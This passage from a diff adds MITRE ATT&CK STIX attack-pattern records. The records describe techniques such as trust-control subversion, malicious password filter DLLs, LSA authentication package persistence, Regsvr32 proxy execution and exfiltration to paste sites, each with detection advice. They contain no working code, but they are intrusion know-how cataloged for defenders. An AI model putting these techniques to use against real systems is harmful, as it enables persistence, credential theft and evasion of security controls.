"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-01T17:17:37.292Z", + "name": "Subvert Trust Controls", + "description": "Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.\n\nAdversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec Digital Certificates) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers. Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017) A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017)\n\nAnalyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure \"Hide Microsoft Entries\" and \"Hide Windows Entries\" are both deselected.(Citation: SpectorOps Subverting Trust Sept 2017) \n\nMonitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Autoruns Analysis", + "Digital Certificate Validation", + "User Mode Signature Validation", + "Windows User Account Control", + "Application Control" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", + "created": "2020-02-05T14:54:07.588Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1553", + "external_id": "T1553" + }, + { + "source_name": "SpectorOps Code Signing Dec 2017", + "description": "Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018.", + "url": "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec" + }, + { + "source_name": "SpectorOps Subverting Trust Sept 2017", + "description": "Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018.", + "url": "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf" + }, + { + "source_name": "Securelist Digital Certificates", + "description": "Ladikov, A. (2015, January 29). Why You Shouldn’t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016.", + "url": "https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/" + }, + { + "source_name": "Symantec Digital Certificates", + "description": "Shinotsuka, H. (2013, February 22). How Attackers Steal Private Keys from Digital Certificates. Retrieved March 31, 2016.", + "url": "http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-11-08T14:00:00.188Z", + "name": "Elevated Execution with Prompt", + "description": "Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. \n\nAlthough this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.\n\nAdversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Jimmy Astle, @AstleJimmy, Carbon Black", + "Erika Noerenberg, @gutterchurl, Carbon Black" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "root" + ], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b84903f0-c7d5-435d-a69e-de47cc3578c0", + "created": "2020-01-30T14:40:20.187Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1548/004", + "external_id": "T1548.004" + }, + { + "source_name": "AppleDocs AuthorizationExecuteWithPrivileges", + "description": "Apple. (n.d.). Apple Developer Documentation - AuthorizationExecuteWithPrivileges. Retrieved August 8, 2019.", + "url": "https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg" + }, + { + "source_name": "Carbon Black Shlayer Feb 2019", + "description": "Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.", + "url": "https://blogs.vmware.com/security/2020/02/vmware-carbon-black-tau-threat-analysis-shlayer-macos.html" + }, + { + "source_name": "Death by 1000 installers; it's all broken!", + "description": "Patrick Wardle. (2017). Death by 1000 installers; it's all broken!. Retrieved August 8, 2019.", + "url": "https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8" + }, + { + "source_name": "OSX Coldroot RAT", + "description": "Patrick Wardle. (2018, February 17). Tearing Apart the Undetected (OSX)Coldroot RAT. Retrieved August 8, 2019.", + "url": "https://objective-see.com/blog/blog_0x2A.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Firmware", + "description": "Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b85f6ce5-81e8-4f36-aff2-3df9d02a9c9d", + "created": "2020-10-02T16:46:42.537Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1592/003", + "external_id": "T1592.003" + }, + { + "source_name": "ArsTechnica Intel", + "description": "Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel source code and proprietary data dumped online. Retrieved October 20, 2020.", + "url": "https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T12:29:47.903Z", + "name": "Encrypted Channel", + "description": "Adversaries may employ an encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", + "created": "2020-03-16T15:33:01.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1573", + "external_id": "T1573" + }, + { + "source_name": "SANS Decrypting SSL", + "description": "Butler, M. (2013, November). Finding Hidden Threats by Decrypting SSL. Retrieved April 5, 2016.", + "url": "http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840" + }, + { + "source_name": "SEI SSL Inspection Risks", + "description": "Dormann, W. (2015, March 13). The Risks of SSL Inspection. Retrieved April 5, 2016.", + "url": "https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Password Filter DLL", + "description": "Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as dynamic link libraries (DLLs) containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts.\n\nBefore registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.\n\nAdversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made. (Citation: Carnal Ownage Password Filters Sept 2013)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Vincent Le Toux" + ], + "x_mitre_detection": "Monitor for change notifications to and from unfamiliar password filters.\n\nNewly installed password filters will not take effect until after a system reboot.\n\nPassword filters will show up as an autorun and loaded DLL in lsass.exe. (Citation: Clymb3r Function Hook Passwords Sept 2013)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b8c5c9dd-a662-479d-9428-ae745872537c", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1174", + "external_id": "T1174" + }, + { + "source_name": "Carnal Ownage Password Filters Sept 2013", + "description": "Fuller, R. (2013, September 11). Stealing passwords every time they change. Retrieved November 21, 2017.", + "url": "http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html" + }, + { + "source_name": "Clymb3r Function Hook Passwords Sept 2013", + "description": "Bialek, J. (2013, September 15). Intercepting Password Changes With Function Hooking. Retrieved November 21, 2017.", + "url": "https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Authentication Package", + "description": "Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)\n\nAdversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ with the key value of \"Authentication Packages\"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec", + "created": "2020-01-24T14:54:42.757Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1547/002", + "external_id": "T1547.002" + }, + { + "source_name": "Graeber 2014", + "description": "Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.", + "url": "http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html" + }, + { + "source_name": "Microsoft Configure LSA", + "description": "Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved June 24, 2015.", + "url": "https://technet.microsoft.com/en-us/library/dn408187.aspx" + }, + { + "source_name": "MSDN Authentication Packages", + "description": "Microsoft. (n.d.). Authentication Packages. Retrieved March 1, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:09.988Z", + "name": "System Firmware", + "description": "System firmware on modern assets is often designed with an update feature. Older device firmware may be factory installed and require special reprograming equipment. When available, the firmware update feature enables vendors to remotely patch bugs and perform upgrades. Device firmware updates are often delegated to the user and may be done using a software update package. It may also be possible to perform this task over the network. \n\nAn adversary may exploit the firmware update feature on accessible devices to upload malicious or out-of-date firmware. Malicious modification of device firmware may provide an adversary with root access to a device, given firmware is one of the lowest programming abstraction layers. (Citation: Basnight, Zachry, et al.)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Operational Databases: Device Alarm", + "Application Log: Application Log Content", + "Firmware: Firmware Modification", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0857", + "external_id": "T0857" + }, + { + "source_name": "Basnight, Zachry, et al.", + "description": "Basnight, Zachry, et al. 2013 Retrieved. 2017/10/17 ", + "url": "http://www.sciencedirect.com/science/article/pii/S1874548213000231" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Regsvr32", + "description": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)\n\nMalicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a \"Squiblydoo\" and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)\n\nRegsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Casey Smith" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Digital Certificate Validation", + "Anti-virus", + "Application control" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "created": "2020-01-23T19:52:17.414Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/010", + "external_id": "T1218.010" + }, + { + "source_name": "FireEye Regsvr32 Targeting Mongolian Gov", + "description": "Anubhav, A., Kizhakkinan, D. (2017, February 22). Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government. Retrieved February 24, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html" + }, + { + "source_name": "LOLBAS Regsvr32", + "description": "LOLBAS. (n.d.). Regsvr32.exe. Retrieved July 31, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/" + }, + { + "source_name": "Microsoft Regsvr32", + "description": "Microsoft. (2015, August 14). How to use the Regsvr32 tool and troubleshoot Regsvr32 error messages. Retrieved June 22, 2016.", + "url": "https://support.microsoft.com/en-us/kb/249873" + }, + { + "source_name": "Carbon Black Squiblydoo Apr 2016", + "description": "Nolen, R. et al.. (2016, April 28). Threat Advisory: “Squiblydoo” Continues Trend of Attackers Using Native OS Tools to “Live off the Land”. Retrieved April 9, 2018.", + "url": "https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Data Compressed", + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Compression software and compressed files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known compression utilities. This may yield a significant amount of benign events, depending on how systems in the environment are typically used.\n\nIf the communications channel is unencrypted, compressed files can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers. (Citation: Wikipedia File Header Signatures)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "created": "2017-05-31T21:30:19.338Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1002", + "external_id": "T1002" + }, + { + "source_name": "Wikipedia File Header Signatures", + "description": "Wikipedia. (2016, March 31). List of file signatures. Retrieved April 22, 2016.", + "url": "https://en.wikipedia.org/wiki/List_of_file_signatures" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-04T18:00:33.023Z", + "name": "Exfiltration to Text Storage Sites", + "description": "Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as pastebin[.]com, are commonly used by developers to share code and other information. \n\nText storage sites are often used to host malicious code for C2 communication (e.g., [Stage Capabilities](https://attack.mitre.org/techniques/T1608)), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.(Citation: Pastebin EchoSec)\n\n**Note:** This is distinct from [Exfiltration to Code Repository](https://attack.mitre.org/techniques/T1567/001), which highlight access to code repositories via APIs.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Harun Küßner" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ba04e672-da86-4e69-aa15-0eca5db25f43", + "created": "2023-02-27T22:51:27.101Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1567/003", + "external_id": "T1567.003" + }, + { + "source_name": "Pastebin EchoSec", + "description": "Ciarniello, A. (2019, September 24). What is Pastebin and Why Do Hackers Love It?. Retrieved April 11, 2023.", + "url": "https://web.archive.org/web/20201107203304/https://www.echosec.net/blog/what-is-pastebin-and-why-do-hackers-love-it" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:10.181Z", + "name": "Masquerading", + "description": "Adversaries may use masquerading to disguise a malicious application or executable as another file, to avoid operator and engineer suspicion. Possible disguises of these masquerading files can include commonly found programs, expected vendor executables and configuration files, and other commonplace application and naming conventions. By impersonating expected and vendor-relevant files and applications, operators and engineers may not notice the presence of the underlying malicious content and possibly end up running those masquerading as legitimate functions. \n\nApplications and other files commonly found on Windows systems or in engineering workstations have been impersonated before. This can be as simple as renaming a file to effectively disguise it in the ICS environment.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Service: Service Creation", + "File: File Modification", + "Command: Command Execution", + "Scheduled Job: Scheduled Job Modification", + "File: File Metadata" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0849", + "external_id": "T0849" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Credentials in Files", + "description": "Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n\nIt is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)\n\nIn cloud environments, authenticated user credentials are often 